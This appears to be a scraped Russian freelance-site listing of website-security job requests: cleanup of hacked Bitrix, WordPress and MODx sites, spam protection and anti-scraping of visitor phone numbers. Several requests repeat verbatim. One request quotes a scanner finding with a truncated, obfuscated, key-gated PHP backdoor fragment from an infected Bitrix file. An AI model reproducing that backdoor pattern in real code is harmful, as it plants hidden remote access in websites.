Услуги по безопасности сайтов в Санкт-Петербурге

Корпоративный сайт. Платформа: Tilda. Объём сайта: 20 страниц. Хочу обучиться проверке сайта на угрозы для открытия своего бизнесаещё

Интернет-магазин. Платформа: 1С-Битрикс. Объём сайта: 1 страница. Сайт supertrus.ru - хостинг провайдер отключили возможность отправки-получения писем. Нужно проверить сайт на наличие стороннего кода: Ответ службы поддержки хостинг-провайдера: Примененный к сайту ограничивающий шаблон блокирует запуск части известных вредоносных скриптов и шеллов, а также препятствует повторному заражению сайта. Наша система среагировала на вирусные сигнатуры: /home/d/dest12/test23/public_html/21a74e26d4a5.php Вероятно, Ваш сайт был взломан. Вам необходимо проверить файлы сайтов на наличие стороннего кода, не характерного для Вашей CMS, а также наличие посторонних файлов среди файлов сайта. Для проверки Вы можете использовать утилиту AI-Bolit. С её помощью Вы можете провести проверку в параноидальный режиме и получить отчет, с указанием файлов, на которые необходимо обратить внимание. Полученную информацию вы можете передать профильным специалистам для дальнейшего анализа. Я проверил и получил вот такие данные (файлы могут быть вредоносными или хакерскими скриптами (1): /home/d/dest12/supertrus.ru/public_html/bitrix/modules/main/include.php.backup [x] …tic function IsFeatureInstalled($_[Телефон скрыт]){return true;}}$GLOBALS['____53545652'][0](___[Телефон скрыт](0),___[Телефон скрыт](1)); if($_REQUEST["key"]!=""){if($_REQUEST["key"]=="a".md5("B_PROLOG_INCLUDED")."e"){$resu1t=copy($_SERVER["DOCUMENT_ROOT"]. Особенно часто вредоносный код попадает через уязвимые темы, шаблоны или плагины, установленные со сторонних ресурсов. Не используйте устаревшие версии CMS и плагинов к ним. Следите за обновлениями! Первоначальные меры, которые нужно предпринять, следующие: Обратиться к профильным специалистам(если такая возможность есть), которые занимаются безопасностью сайтов, для более детального изучения файлов и выявления вредоносного кода и найти причину взлома. После определения причины взлома не ограничивайтесь удалением найденных скриптов - добавленные злоумышленником точки проникновения могут быть хорошо спрятаны. Если сайт работает некорректно, то следует восстановить сайт из резервной копии в разделе Backup, предварительно, закрыв доступ посетителей к нему. Восстановление сайта на дату, когда он был заражен, не исправит ситуацию. На сайте останутся точки проникновения и сами вирусы. Обновить ядро CMS, а также все плагины до последней версии. Удалить неиспользуемые темы и расширения. Проверьте файл .htaccess - в нем могут быть добавлены перенаправления на другие сайты, распространяющие вирус. При этом файл .htaccess может быть размещен как в корне сайта, так и выше, поэтому необходимо просмотреть все директории вашего аккаунта. Найти все файлы .htaccess вы можете с помощью команды: find -name *htaccess, которую вы можете выполнить в WEB Терминале. Обязательно изменить пароли для административной панели сайта, email’ов администратора, FTP, MySQL. Желательно устанавливать сгенерированные случайным образом пароли, их сложнее подобрать. Открыть доступ к сайту. Вот такой фронт работещё

Веб-портал. Платформа: 1С-Битрикс. Объём сайта: 15 страниц. Отразить спам и установить защитуещё

Корпоративный сайт. Платформа: Tilda. Объём сайта: 20 страниц. Хочу обучиться проверке сайта на угрозы для открытия своего бизнесаещё

Интернет-магазин. Платформа: 1С-Битрикс. Объём сайта: 1 страница. Сайт supertrus.ru - хостинг провайдер отключили возможность отправки-получения писем. Нужно проверить сайт на наличие стороннего кода: Ответ службы поддержки хостинг-провайдера: Примененный к сайту ограничивающий шаблон блокирует запуск части известных вредоносных скриптов и шеллов, а также препятствует повторному заражению сайта. Наша система среагировала на вирусные сигнатуры: /home/d/dest12/test23/public_html/21a74e26d4a5.php Вероятно, Ваш сайт был взломан. Вам необходимо проверить файлы сайтов на наличие стороннего кода, не характерного для Вашей CMS, а также наличие посторонних файлов среди файлов сайта. Для проверки Вы можете использовать утилиту AI-Bolit. С её помощью Вы можете провести проверку в параноидальный режиме и получить отчет, с указанием файлов, на которые необходимо обратить внимание. Полученную информацию вы можете передать профильным специалистам для дальнейшего анализа. Я проверил и получил вот такие данные (файлы могут быть вредоносными или хакерскими скриптами (1): /home/d/dest12/supertrus.ru/public_html/bitrix/modules/main/include.php.backup [x] …tic function IsFeatureInstalled($_[Телефон скрыт]){return true;}}$GLOBALS['____53545652'][0](___[Телефон скрыт](0),___[Телефон скрыт](1)); if($_REQUEST["key"]!=""){if($_REQUEST["key"]=="a".md5("B_PROLOG_INCLUDED")."e"){$resu1t=copy($_SERVER["DOCUMENT_ROOT"]. Особенно часто вредоносный код попадает через уязвимые темы, шаблоны или плагины, установленные со сторонних ресурсов. Не используйте устаревшие версии CMS и плагинов к ним. Следите за обновлениями! Первоначальные меры, которые нужно предпринять, следующие: Обратиться к профильным специалистам(если такая возможность есть), которые занимаются безопасностью сайтов, для более детального изучения файлов и выявления вредоносного кода и найти причину взлома. После определения причины взлома не ограничивайтесь удалением найденных скриптов - добавленные злоумышленником точки проникновения могут быть хорошо спрятаны. Если сайт работает некорректно, то следует восстановить сайт из резервной копии в разделе Backup, предварительно, закрыв доступ посетителей к нему. Восстановление сайта на дату, когда он был заражен, не исправит ситуацию. На сайте останутся точки проникновения и сами вирусы. Обновить ядро CMS, а также все плагины до последней версии. Удалить неиспользуемые темы и расширения. Проверьте файл .htaccess - в нем могут быть добавлены перенаправления на другие сайты, распространяющие вирус. При этом файл .htaccess может быть размещен как в корне сайта, так и выше, поэтому необходимо просмотреть все директории вашего аккаунта. Найти все файлы .htaccess вы можете с помощью команды: find -name *htaccess, которую вы можете выполнить в WEB Терминале. Обязательно изменить пароли для административной панели сайта, email’ов администратора, FTP, MySQL. Желательно устанавливать сгенерированные случайным образом пароли, их сложнее подобрать. Открыть доступ к сайту. Вот такой фронт работещё

Веб-портал. Платформа: 1С-Битрикс. Объём сайта: 15 страниц. Отразить спам и установить защитуещё

Другое. Платформа: WordPress. Объём сайта: 1000 страниц. Нужно лечение и защита 2-х сайтов от вирусов (перенаправление в мобильной версии) . Один сайт на вордпрессе. второй на диафанеещё

Корпоративный сайт. Платформа: Tilda. Объём сайта: 20 страниц. Хочу обучиться проверке сайта на угрозы для открытия своего бизнесаещё

Интернет-магазин. Платформа: 1С-Битрикс. Объём сайта: 1 страница. Сайт supertrus.ru - хостинг провайдер отключили возможность отправки-получения писем. Нужно проверить сайт на наличие стороннего кода: Ответ службы поддержки хостинг-провайдера: Примененный к сайту ограничивающий шаблон блокирует запуск части известных вредоносных скриптов и шеллов, а также препятствует повторному заражению сайта. Наша система среагировала на вирусные сигнатуры: /home/d/dest12/test23/public_html/21a74e26d4a5.php Вероятно, Ваш сайт был взломан. Вам необходимо проверить файлы сайтов на наличие стороннего кода, не характерного для Вашей CMS, а также наличие посторонних файлов среди файлов сайта. Для проверки Вы можете использовать утилиту AI-Bolit. С её помощью Вы можете провести проверку в параноидальный режиме и получить отчет, с указанием файлов, на которые необходимо обратить внимание. Полученную информацию вы можете передать профильным специалистам для дальнейшего анализа. Я проверил и получил вот такие данные (файлы могут быть вредоносными или хакерскими скриптами (1): /home/d/dest12/supertrus.ru/public_html/bitrix/modules/main/include.php.backup [x] …tic function IsFeatureInstalled($_[Телефон скрыт]){return true;}}$GLOBALS['____53545652'][0](___[Телефон скрыт](0),___[Телефон скрыт](1)); if($_REQUEST["key"]!=""){if($_REQUEST["key"]=="a".md5("B_PROLOG_INCLUDED")."e"){$resu1t=copy($_SERVER["DOCUMENT_ROOT"]. Особенно часто вредоносный код попадает через уязвимые темы, шаблоны или плагины, установленные со сторонних ресурсов. Не используйте устаревшие версии CMS и плагинов к ним. Следите за обновлениями! Первоначальные меры, которые нужно предпринять, следующие: Обратиться к профильным специалистам(если такая возможность есть), которые занимаются безопасностью сайтов, для более детального изучения файлов и выявления вредоносного кода и найти причину взлома. После определения причины взлома не ограничивайтесь удалением найденных скриптов - добавленные злоумышленником точки проникновения могут быть хорошо спрятаны. Если сайт работает некорректно, то следует восстановить сайт из резервной копии в разделе Backup, предварительно, закрыв доступ посетителей к нему. Восстановление сайта на дату, когда он был заражен, не исправит ситуацию. На сайте останутся точки проникновения и сами вирусы. Обновить ядро CMS, а также все плагины до последней версии. Удалить неиспользуемые темы и расширения. Проверьте файл .htaccess - в нем могут быть добавлены перенаправления на другие сайты, распространяющие вирус. При этом файл .htaccess может быть размещен как в корне сайта, так и выше, поэтому необходимо просмотреть все директории вашего аккаунта. Найти все файлы .htaccess вы можете с помощью команды: find -name *htaccess, которую вы можете выполнить в WEB Терминале. Обязательно изменить пароли для административной панели сайта, email’ов администратора, FTP, MySQL. Желательно устанавливать сгенерированные случайным образом пароли, их сложнее подобрать. Открыть доступ к сайту. Вот такой фронт работещё

Веб-портал. Платформа: 1С-Битрикс. Объём сайта: 15 страниц. Отразить спам и установить защитуещё

Веб-портал. Платформа: госвеб. Объём сайта: 13 страниц. Проверить на наличие информации о противодействии экстеримизму, социальной рекламе. Это сайт школыещё

Интернет-магазин. Платформа: 1С-Битрикс. Объём сайта: 20 страниц. На одном хостинге рег ру работали сайты вордпресс, битрикс, друпал и возможно тильда. 2.02.25 регру блокировал хостинг за вредоносное по и аномалию исходящего трафика. Хостинг восстановлен из бекапа. 3.02.25 на сайте ***s.ru не было ssl сертификата. 4.02.25 продлена лицензия битрикс (чтоб обновиться, но новых обновлений не было найдено, до 8 php обновиться не удалось, слетает сайт) оплачена опция лечения от рег ру. Есть скан вирусов на эту дату (4 на битриксе, 1 на вордпресс). Лечение от регру не помогает. Часть сайтов слетает, вирусы возвращаются. 10.03.25 в связи с перегрузкой хостинга сайты вордпресс перенесены на отдельный хостинг. При лечении регру слетает сайт i***. После восстановления из бекапа админка открывается, но перейти в пункты меню не даёт (wordfence не установить) На r**.g***s wordfance вирусов не находит, из уязвимостей: необновленный элементор (при обновлении слетает сайт) и бесплатная версия плагина slider revolution. 12.02.25. Проверка регру фиксирует вирусы на всех сайтах. Штатные методы борьбы не помогли. При скачивании бекапов с регру от 11.02.25 на компьютер касперский блокировал архивы сайтов lp.im***s.ru и p***s.com, обнаружив Heur: Backdoor.PHP.WebSell.gen. Есть бекапы: - всего аккаунта хостинга от 6.01.25 и 7.01.25. - отдельно сайтов и баз данных от 11.02.25 Нужно вылечить от вирусовещё

Лендинг. Платформа: MODx. У нас сайт на modx, лейдинг. На него ведется много трафика. Наши конкуренты парсят с наших лейдингов номера телефонов клиентов, и потом начинают массовый обзвон. Есть полуряные сервисы БИГ ДАТА и Ванрезалт, где добавляешь ссылку на сайт и он тебе генерирует номера телефонов посетителей. Цель как сделать так, чтобы никакой из этих сервисов или других по аналогичный системе не мог спарсить номера, чтобы защитить себя как компанию и клиентов от массового обзвонаещё

Сайт-визитка. Платформа: 1С-Битрикс. Здравствуйте ! Сайт geliosartshop.ru взломали/заразили. В данный момент у нас имеется резервная копия сайта до взлома/заражения, но если её поместить в папку "public_html", то через какое-то время происходит заражение/изменения файлов "index.php", ".htaccess", "robots.txt". Создание посторонних каталогов и файлов, которые распознаются антивирусом в аккаунте "SpaceWeb" как файлы с потенциально опасным содержимым. Лечение, восстановление из резервной копии не помогает, т.к. всё перезаписывается сноваещё

Воруют контакты с сайта. Платформа: WordPress. Объём сайта: 1 страница. Воруют контакты с сайта автошколы - ученик заходит, ему звонят другие школыещё